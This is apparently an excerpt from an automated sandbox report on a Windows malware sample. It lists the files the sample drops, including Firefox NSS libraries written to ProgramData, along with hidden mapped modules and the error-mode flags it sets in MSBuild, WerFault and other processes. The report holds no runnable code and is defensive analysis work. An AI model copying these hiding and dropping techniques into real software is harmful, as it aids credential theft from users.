Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_004176C5 push ecx; ret	1_2_004176D8
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA8B536 push ecx; ret	1_2_6BA8B549
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00CFFAB6 push ecx; ret	3_2_00CFFAC9
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00CFFB55 push ecx; ret	3_2_00CFFB68
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00BB0F0B push 8B00D6D1h; retf	3_2_00BB0F10
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_6C9D47D9 push ecx; ret	3_2_6C9D47EC
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_6C9D6365 push ecx; ret	3_2_6C9D6378

Source: ssfwvk.6.dr	Static PE information: section name: .text entropy: 6.816444465715168
Source: nkho.15.dr	Static PE information: section name: .text entropy: 6.816444465715168

Source: C:\Users\user\Desktop\VucRf0jboS.exe	File created: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\VucRf0jboS.exe	File created: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\VucRf0jboS.exe	File created: C:\Users\user\AppData\Local\Temp\u5qk.2\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\VucRf0jboS.exe	File created: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\ssfwvk	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\VucRf0jboS.exe	File created: C:\Users\user\AppData\Local\Temp\u5qk.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\nkho	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\ssfwvk			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\nkho			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\SSFWVK
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\NKHO

Source: C:\Users\user\Desktop\VucRf0jboS.exe

Code function: 0_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00408761

Source: C:\Users\user\Desktop\VucRf0jboS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
